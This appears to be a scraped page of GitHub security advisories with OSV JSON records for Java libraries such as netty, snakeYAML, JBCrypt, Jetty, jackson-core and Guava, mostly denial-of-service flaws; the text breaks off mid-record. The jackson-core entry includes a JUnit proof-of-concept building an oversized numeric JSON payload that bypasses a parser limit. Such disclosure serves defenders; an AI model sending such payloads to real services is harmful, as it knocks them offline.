The SniHandler class is a handler that waits for the TLS handshake to configure a SslHandler according to the indicated server name by the ClientHello record. For this matter it allocates a ByteBuf using the value defined in the ClientHello record.
Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the SslClientHelloHandler
1/ allocate a 16MB ByteBuf
2/ not fail decode method in buffer
3/ get out of the loop without an exception
The combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection.
Impact
If the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. This could lead to a OutOfMemoryError and so result in a DDOS.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "io.netty:netty-handler"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.1.94.Final"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-34462"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2023-06-20T16:33:22Z",
"nvd_published_at": "2023-06-22T23:15:09Z",
"severity": "MODERATE"
},
"details": "### Summary\nThe `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap.\n\n### Details\nThe `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. \n\nNormally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler`\n\n1/ allocate a 16MB `ByteBuf`\n2/ not fail `decode` method `in` buffer\n3/ get out of the loop without an exception\n\nThe combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection.\n\n### Impact\nIf the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. This could lead to a OutOfMemoryError and so result in a DDOS.",
"id": "GHSA-6mjq-h674-j845",
"modified": "2024-06-24T21:24:21Z",
"published": "2023-06-20T16:33:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/netty/netty/security/advisories/GHSA-6mjq-h674-j845"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34462"
},
{
"type": "WEB",
"url": "https://github.com/netty/netty/commit/535da17e45201ae4278c0479e6162bb4127d4c32"
},
{
"type": "PACKAGE",
"url": "https://github.com/netty/netty"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20230803-0001"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240621-0007"
},
{
"type": "WEB",
"url": "https://www.debian.org/security/2023/dsa-5558"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "netty-handler SniHandler 16MB allocation"
}
GHSA-9W3M-GQGF-C4P9
Vulnerability from github – Published: 2022-09-06 00:00 – Updated: 2024-03-15 12:30Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.yaml:snakeyaml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.32"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2022-38752"
],
"database_specific": {
"cwe_ids": [
"CWE-121",
"CWE-787"
],
"github_reviewed": true,
"github_reviewed_at": "2022-09-13T21:29:45Z",
"nvd_published_at": "2022-09-05T10:15:00Z",
"severity": "MODERATE"
},
"details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow.",
"id": "GHSA-9w3m-gqgf-c4p9",
"modified": "2024-03-15T12:30:35Z",
"published": "2022-09-06T00:00:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38752"
},
{
"type": "PACKAGE",
"url": "https://bitbucket.org/snakeyaml/snakeyaml"
},
{
"type": "WEB",
"url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/531/stackoverflow-oss-fuzz-47081"
},
{
"type": "WEB",
"url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47081"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202305-28"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20240315-0009"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write"
}
GHSA-9H6P-92JQ-888X
Vulnerability from github – Published: 2022-05-13 01:05 – Updated: 2022-07-06 20:28Integer overflow in the crypt_raw method in the key-stretching implementation in JBCrypt before 0.4 makes it easier for remote attackers to determine cleartext values of password hashes via a brute-force attack against hashes associated with the maximum exponent.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.mindrot:jbcrypt"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2015-0886"
],
"database_specific": {
"cwe_ids": [
"CWE-190"
],
"github_reviewed": true,
"github_reviewed_at": "2022-07-06T20:28:22Z",
"nvd_published_at": "2015-02-28T02:59:00Z",
"severity": "MODERATE"
},
"details": "Integer overflow in the crypt_raw method in the key-stretching implementation in JBCrypt before 0.4 makes it easier for remote attackers to determine cleartext values of password hashes via a brute-force attack against hashes associated with the maximum exponent.",
"id": "GHSA-9h6p-92jq-888x",
"modified": "2022-07-06T20:28:22Z",
"published": "2022-05-13T01:05:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2015-0886"
},
{
"type": "WEB",
"url": "https://bugzilla.mindrot.org/show_bug.cgi?id=2097"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rbd23e3ac8113b4da0a025c0e45170b6ec317383a1cf06090c2c717aa@%3Ccommits.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/rd5c2256b8dc9935e4bb5e9be90adce58408054bb42523730a40c5548@%3Ccommits.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread.html/re330cfe9e5d84e3f7da8ace23ec32f38cb3fbd328bf177badd7ad942@%3Ccommits.cassandra.apache.org%3E"
},
{
"type": "WEB",
"url": "http://jvn.jp/en/jp/JVN77718330/index.html"
},
{
"type": "WEB",
"url": "http://jvndb.jvn.jp/jvndb/JVNDB-2015-000033"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-March/151496.html"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-March/151786.html"
},
{
"type": "WEB",
"url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-March/151797.html"
},
{
"type": "WEB",
"url": "http://www.mindrot.org/projects/jBCrypt/news/rel04.html"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Integer Overflow or Wraparound in JBCrypt"
}
GHSA-J26W-F9RQ-MR2Q
Vulnerability from github – Published: 2024-10-14 15:30 – Updated: 2025-11-03 21:31Description There exists a security vulnerability in Jetty's DosFilter which can be exploited by unauthorized users to cause remote denial-of-service (DoS) attack on the server using DosFilter. By repeatedly sending crafted requests, attackers can trigger OutofMemory errors and exhaust the server's memory finally.
Vulnerability details The Jetty DoSFilter (Denial of Service Filter) is a security filter designed to protect web applications against certain types of Denial of Service (DoS) attacks and other abusive behavior. It helps to mitigate excessive resource consumption by limiting the rate at which clients can make requests to the server. The DoSFilter monitors and tracks client request patterns, including request rates, and can take actions such as blocking or delaying requests from clients that exceed predefined thresholds. The internal tracking of requests in DoSFilter is the source of this OutOfMemory condition.
Impact Users of the DoSFilter may be subject to DoS attacks that will ultimately exhaust the memory of the server if they have not configured session passivation or an aggressive session inactivation timeout.
Patches The DoSFilter has been patched in all active releases to no longer support the session tracking mode, even if configured.
Patched releases:
- 9.4.54
- 10.0.18
- 11.0.18
- 12.0.3
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty.ee10:jetty-ee10-servlets"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.0.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty.ee8:jetty-ee8-servlets"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.0.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty.ee9:jetty-ee9-servlets"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.0.3"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-servlets"
},
"ranges": [
{
"events": [
{
"introduced": "9.0.0"
},
{
"fixed": "9.4.54"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-servlets"
},
"ranges": [
{
"events": [
{
"introduced": "10.0.0"
},
{
"fixed": "10.0.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-servlets"
},
"ranges": [
{
"events": [
{
"introduced": "11.0.0"
},
{
"fixed": "11.0.18"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-9823"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-14T21:14:31Z",
"nvd_published_at": "2024-10-14T15:15:14Z",
"severity": "MODERATE"
},
"details": "Description\nThere exists a security vulnerability in Jetty\u0027s DosFilter which can be exploited by unauthorized users to cause remote denial-of-service (DoS) attack on the server using DosFilter. By repeatedly sending crafted requests, attackers can trigger OutofMemory errors and exhaust the server\u0027s memory finally.\n\n\nVulnerability details\nThe Jetty DoSFilter (Denial of Service Filter) is a security filter designed to protect web applications against certain types of Denial of Service (DoS) attacks and other abusive behavior. It helps to mitigate excessive resource consumption by limiting the rate at which clients can make requests to the server. The DoSFilter monitors and tracks client request patterns, including request rates, and can take actions such as blocking or delaying requests from clients that exceed predefined thresholds. The internal tracking of requests in DoSFilter is the source of this OutOfMemory condition.\n\n\nImpact\nUsers of the DoSFilter may be subject to DoS attacks that will ultimately exhaust the memory of the server if they have not configured session passivation or an aggressive session inactivation timeout.\n\n\nPatches\nThe DoSFilter has been patched in all active releases to no longer support the session tracking mode, even if configured.\n\n\nPatched releases:\n\n * 9.4.54\n * 10.0.18\n * 11.0.18\n * 12.0.3",
"id": "GHSA-j26w-f9rq-mr2q",
"modified": "2025-11-03T21:31:16Z",
"published": "2024-10-14T15:30:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-7hcf-ppf8-5w5h"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9823"
},
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/issues/1256"
},
{
"type": "PACKAGE",
"url": "https://github.com/jetty/jetty.project"
},
{
"type": "WEB",
"url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/39"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00001.html"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250306-0006"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Eclipse Jetty has a denial of service vulnerability on DosFilter"
}
GHSA-72HV-8253-57QQ
Vulnerability from github – Published: 2026-02-28 02:01 – Updated: 2026-04-07 16:30Summary
The non-blocking (async) JSON parser in jackson-core bypasses the maxNumberLength constraint (default: 1000 characters) defined in StreamReadConstraints. This allows an attacker to send JSON with arbitrarily long numbers through the async parser API, leading to excessive memory allocation and potential CPU exhaustion, resulting in a Denial of Service (DoS).
The standard synchronous parser correctly enforces this limit, but the async parser fails to do so, creating an inconsistent enforcement policy.
Details
The root cause is that the async parsing path in NonBlockingUtf8JsonParserBase (and related classes) does not call the methods responsible for number length validation.
- The number parsing methods (e.g.,
_finishNumberIntegralPart) accumulate digits into theTextBufferwithout any length checks. - After parsing, they call
_valueComplete(), which finalizes the token but does not callresetInt()orresetFloat(). - The
resetInt()/resetFloat()methods inParserBaseare where thevalidateIntegerLength()andvalidateFPLength()checks are performed. - Because this validation step is skipped, the
maxNumberLengthconstraint is never enforced in the async code path.
PoC
The following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.
package tools.jackson.core.unittest.dos;
import java.nio.charset.StandardCharsets;
import org.junit.jupiter.api.Test;
import tools.jackson.core.*;
import tools.jackson.core.exc.StreamConstraintsException;
import tools.jackson.core.json.JsonFactory;
import tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;
import static org.junit.jupiter.api.Assertions.*;
/**
* POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers
*
* Authors: sprabhav7, rohan-repos
*
* maxNumberLength default = 1000 characters (digits).
* A number with more than 1000 digits should be rejected by any parser.
*
* BUG: The async parser never calls resetInt()/resetFloat() which is where
* validateIntegerLength()/validateFPLength() lives. Instead it calls
* _valueComplete() which skips all number length validation.
*
* CWE-770: Allocation of Resources Without Limits or Throttling
*/
class AsyncParserNumberLengthBypassTest {
private static final int MAX_NUMBER_LENGTH = 1000;
private static final int TEST_NUMBER_LENGTH = 5000;
private final JsonFactory factory = new JsonFactory();
// CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength
@Test
void syncParserRejectsLongNumber() throws Exception {
byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
// Output to console
System.out.println("[SYNC] Parsing " + TEST_NUMBER_LENGTH + "-digit number (limit: " + MAX_NUMBER_LENGTH + ")");
try {
try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {
while (p.nextToken() != null) {
if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
System.out.println("[SYNC] Accepted number with " + p.getText().length() + " digits — UNEXPECTED");
}
}
}
fail("Sync parser must reject a " + TEST_NUMBER_LENGTH + "-digit number");
} catch (StreamConstraintsException e) {
System.out.println("[SYNC] Rejected with StreamConstraintsException: " + e.getMessage());
}
}
// VULNERABILITY: Async parser accepts the SAME number that sync rejects
@Test
void asyncParserAcceptsLongNumber() throws Exception {
byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);
NonBlockingByteArrayJsonParser p =
(NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());
p.feedInput(payload, 0, payload.length);
p.endOfInput();
boolean foundNumber = false;
try {
while (p.nextToken() != null) {
if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {
foundNumber = true;
String numberText = p.getText();
assertEquals(TEST_NUMBER_LENGTH, numberText.length(),
"Async parser silently accepted all " + TEST_NUMBER_LENGTH + " digits");
}
}
// Output to console
System.out.println("[ASYNC INT] Accepted number with " + TEST_NUMBER_LENGTH + " digits — BUG CONFIRMED");
assertTrue(foundNumber, "Parser should have produced a VALUE_NUMBER_INT token");
} catch (StreamConstraintsException e) {
fail("Bug is fixed — async parser now correctly rejects long numbers: " + e.getMessage());
}
p.close();
}
private byte[] buildPayloadWithLongInteger(int numDigits) {
StringBuilder sb = new StringBuilder(numDigits + 10);
sb.append("{\"v\":");
for (int i = 0; i < numDigits; i++) {
sb.append((char) ('1' + (i % 9)));
}
sb.append('}');
return sb.toString().getBytes(StandardCharsets.UTF_8);
}
}
Impact
A malicious actor can send a JSON document with an arbitrarily long number to an application using the async parser (e.g., in a Spring WebFlux or other reactive application). This can cause:
1. Memory Exhaustion: Unbounded allocation of memory in the TextBuffer to store the number's digits, leading to an OutOfMemoryError.
2. CPU Exhaustion: If the application subsequently calls getBigIntegerValue() or getDecimalValue(), the JVM can be tied up in O(n^2) BigInteger parsing operations, leading to a CPU-based DoS.
Suggested Remediation
The async parsing path should be updated to respect the maxNumberLength constraint. The simplest fix appears to ensure that _valueComplete() or a similar method in the async path calls the appropriate validation methods (resetInt() or resetFloat()) already present in ParserBase, mirroring the behavior of the synchronous parsers.
NOTE: This research was performed in collaboration with rohan-repos
{
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{
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"ecosystem": "Maven",
"name": "tools.jackson.core:jackson-core"
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},
{
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}
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}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.18.5"
},
"package": {
"ecosystem": "Maven",
"name": "com.fasterxml.jackson.core:jackson-core"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0"
},
{
"fixed": "2.18.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-28T02:01:05Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nThe non-blocking (async) JSON parser in `jackson-core` bypasses the `maxNumberLength` constraint (default: 1000 characters) defined in `StreamReadConstraints`. This allows an attacker to send JSON with arbitrarily long numbers through the async parser API, leading to excessive memory allocation and potential CPU exhaustion, resulting in a Denial of Service (DoS).\n\nThe standard synchronous parser correctly enforces this limit, but the async parser fails to do so, creating an inconsistent enforcement policy.\n\n### Details\nThe root cause is that the async parsing path in `NonBlockingUtf8JsonParserBase` (and related classes) does not call the methods responsible for number length validation.\n\n- The number parsing methods (e.g., `_finishNumberIntegralPart`) accumulate digits into the `TextBuffer` without any length checks.\n- After parsing, they call `_valueComplete()`, which finalizes the token but does **not** call `resetInt()` or `resetFloat()`.\n- The `resetInt()`/`resetFloat()` methods in `ParserBase` are where the `validateIntegerLength()` and `validateFPLength()` checks are performed.\n- Because this validation step is skipped, the `maxNumberLength` constraint is never enforced in the async code path.\n\n### PoC\nThe following JUnit 5 test demonstrates the vulnerability. It shows that the async parser accepts a 5,000-digit number, whereas the limit should be 1,000.\n\n```java\npackage tools.jackson.core.unittest.dos;\n\nimport java.nio.charset.StandardCharsets;\n\nimport org.junit.jupiter.api.Test;\n\nimport tools.jackson.core.*;\nimport tools.jackson.core.exc.StreamConstraintsException;\nimport tools.jackson.core.json.JsonFactory;\nimport tools.jackson.core.json.async.NonBlockingByteArrayJsonParser;\n\nimport static org.junit.jupiter.api.Assertions.*;\n\n/**\n * POC: Number Length Constraint Bypass in Non-Blocking (Async) JSON Parsers\n *\n * Authors: sprabhav7, rohan-repos\n * \n * maxNumberLength default = 1000 characters (digits).\n * A number with more than 1000 digits should be rejected by any parser.\n *\n * BUG: The async parser never calls resetInt()/resetFloat() which is where\n * validateIntegerLength()/validateFPLength() lives. Instead it calls\n * _valueComplete() which skips all number length validation.\n *\n * CWE-770: Allocation of Resources Without Limits or Throttling\n */\nclass AsyncParserNumberLengthBypassTest {\n\n private static final int MAX_NUMBER_LENGTH = 1000;\n private static final int TEST_NUMBER_LENGTH = 5000;\n\n private final JsonFactory factory = new JsonFactory();\n\n // CONTROL: Sync parser correctly rejects a number exceeding maxNumberLength\n @Test\n void syncParserRejectsLongNumber() throws Exception {\n byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);\n\t\t\n\t\t// Output to console\n System.out.println(\"[SYNC] Parsing \" + TEST_NUMBER_LENGTH + \"-digit number (limit: \" + MAX_NUMBER_LENGTH + \")\");\n try {\n try (JsonParser p = factory.createParser(ObjectReadContext.empty(), payload)) {\n while (p.nextToken() != null) {\n if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {\n System.out.println(\"[SYNC] Accepted number with \" + p.getText().length() + \" digits \u2014 UNEXPECTED\");\n }\n }\n }\n fail(\"Sync parser must reject a \" + TEST_NUMBER_LENGTH + \"-digit number\");\n } catch (StreamConstraintsException e) {\n System.out.println(\"[SYNC] Rejected with StreamConstraintsException: \" + e.getMessage());\n }\n }\n\n // VULNERABILITY: Async parser accepts the SAME number that sync rejects\n @Test\n void asyncParserAcceptsLongNumber() throws Exception {\n byte[] payload = buildPayloadWithLongInteger(TEST_NUMBER_LENGTH);\n\n NonBlockingByteArrayJsonParser p =\n (NonBlockingByteArrayJsonParser) factory.createNonBlockingByteArrayParser(ObjectReadContext.empty());\n p.feedInput(payload, 0, payload.length);\n p.endOfInput();\n\n boolean foundNumber = false;\n try {\n while (p.nextToken() != null) {\n if (p.currentToken() == JsonToken.VALUE_NUMBER_INT) {\n foundNumber = true;\n String numberText = p.getText();\n assertEquals(TEST_NUMBER_LENGTH, numberText.length(),\n \"Async parser silently accepted all \" + TEST_NUMBER_LENGTH + \" digits\");\n }\n }\n // Output to console\n System.out.println(\"[ASYNC INT] Accepted number with \" + TEST_NUMBER_LENGTH + \" digits \u2014 BUG CONFIRMED\");\n assertTrue(foundNumber, \"Parser should have produced a VALUE_NUMBER_INT token\");\n } catch (StreamConstraintsException e) {\n fail(\"Bug is fixed \u2014 async parser now correctly rejects long numbers: \" + e.getMessage());\n }\n p.close();\n }\n\n private byte[] buildPayloadWithLongInteger(int numDigits) {\n StringBuilder sb = new StringBuilder(numDigits + 10);\n sb.append(\"{\\\"v\\\":\");\n for (int i = 0; i \u003c numDigits; i++) {\n sb.append((char) (\u00271\u0027 + (i % 9)));\n }\n sb.append(\u0027}\u0027);\n return sb.toString().getBytes(StandardCharsets.UTF_8);\n }\n}\n\n```\n\n\n### Impact\nA malicious actor can send a JSON document with an arbitrarily long number to an application using the async parser (e.g., in a Spring WebFlux or other reactive application). This can cause:\n1. **Memory Exhaustion:** Unbounded allocation of memory in the `TextBuffer` to store the number\u0027s digits, leading to an `OutOfMemoryError`.\n2. **CPU Exhaustion:** If the application subsequently calls `getBigIntegerValue()` or `getDecimalValue()`, the JVM can be tied up in O(n^2) `BigInteger` parsing operations, leading to a CPU-based DoS.\n\n### Suggested Remediation\n\nThe async parsing path should be updated to respect the `maxNumberLength` constraint. The simplest fix appears to ensure that `_valueComplete()` or a similar method in the async path calls the appropriate validation methods (`resetInt()` or `resetFloat()`) already present in `ParserBase`, mirroring the behavior of the synchronous parsers.\n\n**NOTE:** This research was performed in collaboration with [rohan-repos](https://github.com/rohan-repos)",
"id": "GHSA-72hv-8253-57qq",
"modified": "2026-04-07T16:30:17Z",
"published": "2026-02-28T02:01:05Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-core/security/advisories/GHSA-72hv-8253-57qq"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-core/pull/1555"
},
{
"type": "WEB",
"url": "https://github.com/FasterXML/jackson-core/commit/b0c428e6f993e1b5ece5c1c3cb2523e887cd52cf"
},
{
"type": "PACKAGE",
"url": "https://github.com/FasterXML/jackson-core"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "jackson-core: Number Length Constraint Bypass in Async Parser Leads to Potential DoS Condition"
}
GHSA-7G45-4RM6-3MM3
Vulnerability from github – Published: 2023-06-14 18:30 – Updated: 2025-11-04 16:44Use of Java's default temporary directory for file creation in FileBackedOutputStream in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.
Even though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "com.google.guava:guava"
},
"ranges": [
{
"events": [
{
"introduced": "1.0"
},
{
"fixed": "32.0.0-android"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-2976"
],
"database_specific": {
"cwe_ids": [
"CWE-379",
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2023-06-14T21:01:07Z",
"nvd_published_at": "2023-06-14T18:15:09Z",
"severity": "MODERATE"
},
"details": "Use of Java\u0027s default temporary directory for file creation in `FileBackedOutputStream` in Google Guava versions 1.0 to 31.1 on Unix systems and Android Ice Cream Sandwich allows other users and apps on the machine with access to the default Java temporary directory to be able to access the files created by the class.\n\nEven though the security vulnerability is fixed in version 32.0.0, maintainers recommend using version 32.0.1 as version 32.0.0 breaks some functionality under Windows.",
"id": "GHSA-7g45-4rm6-3mm3",
"modified": "2025-11-04T16:44:26Z",
"published": "2023-06-14T18:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2976"
},
{
"type": "WEB",
"url": "https://github.com/google/guava/issues/2575"
},
{
"type": "WEB",
"url": "https://github.com/google/guava/issues/6532"
},
{
"type": "WEB",
"url": "https://github.com/google/guava/commit/feb83a1c8fd2e7670b244d5afd23cba5aca43284"
},
{
"type": "PACKAGE",
"url": "https://github.com/google/guava"
},
{
"type": "WEB",
"url": "https://github.com/google/guava/releases/tag/v32.0.0"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20230818-0008"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20241108-0002"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01006.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Guava vulnerable to insecure use of temporary directory"
}
GHSA-G8M5-722R-8WHQ
Vulnerability from github – Published: 2024-10-14 21:08 – Updated: 2025-11-03 22:49Impact
Remote DOS attack can cause out of memory
Description
There exists a security vulnerability in Jetty's ThreadLimitHandler.getRemote() which
can be exploited by unauthorized users to cause remote denial-of-service (DoS) attack. By
repeatedly sending crafted requests, attackers can trigger OutofMemory errors and exhaust the
server's memory.
Affected Versions
- Jetty 12.0.0-12.0.8 (Supported)
- Jetty 11.0.0-11.0.23 (EOL)
- Jetty 10.0.0-10.0.23 (EOL)
- Jetty 9.3.12-9.4.55 (EOL)
Patched Versions
- Jetty 12.0.9
- Jetty 11.0.24
- Jetty 10.0.24
- Jetty 9.4.56
Workarounds
Do not use ThreadLimitHandler.
Consider use of QoSHandler instead to artificially limit resource utilization.
References
Jetty 12 - https://github.com/jetty/jetty.project/pull/11723
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.0.8"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-server"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0"
},
{
"fixed": "12.0.9"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 10.0.23"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-server"
},
"ranges": [
{
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"introduced": "10.0.0"
},
{
"fixed": "10.0.24"
}
],
"type": "ECOSYSTEM"
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]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.0.23"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-server"
},
"ranges": [
{
"events": [
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"introduced": "11.0.0"
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"fixed": "11.0.24"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 9.4.55"
},
"package": {
"ecosystem": "Maven",
"name": "org.eclipse.jetty:jetty-server"
},
"ranges": [
{
"events": [
{
"introduced": "9.3.12"
},
{
"fixed": "9.4.56"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-8184"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-14T21:08:38Z",
"nvd_published_at": "2024-10-14T16:15:04Z",
"severity": "MODERATE"
},
"details": "### Impact\nRemote DOS attack can cause out of memory \n\n### Description\nThere exists a security vulnerability in Jetty\u0027s `ThreadLimitHandler.getRemote()` which\ncan be exploited by unauthorized users to cause remote denial-of-service (DoS) attack. By\nrepeatedly sending crafted requests, attackers can trigger OutofMemory errors and exhaust the\nserver\u0027s memory.\n\n### Affected Versions\n\n* Jetty 12.0.0-12.0.8 (Supported)\n* Jetty 11.0.0-11.0.23 (EOL)\n* Jetty 10.0.0-10.0.23 (EOL)\n* Jetty 9.3.12-9.4.55 (EOL)\n\n### Patched Versions\n\n* Jetty 12.0.9\n* Jetty 11.0.24\n* Jetty 10.0.24\n* Jetty 9.4.56\n\n### Workarounds\n\nDo not use `ThreadLimitHandler`. \nConsider use of `QoSHandler` instead to artificially limit resource utilization.\n\n### References\n\nJetty 12 - https://github.com/jetty/jetty.project/pull/11723",
"id": "GHSA-g8m5-722r-8whq",
"modified": "2025-11-03T22:49:11Z",
"published": "2024-10-14T21:08:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/security/advisories/GHSA-g8m5-722r-8whq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8184"
},
{
"type": "WEB",
"url": "https://github.com/jetty/jetty.project/pull/11723"
},
{
"type": "PACKAGE",
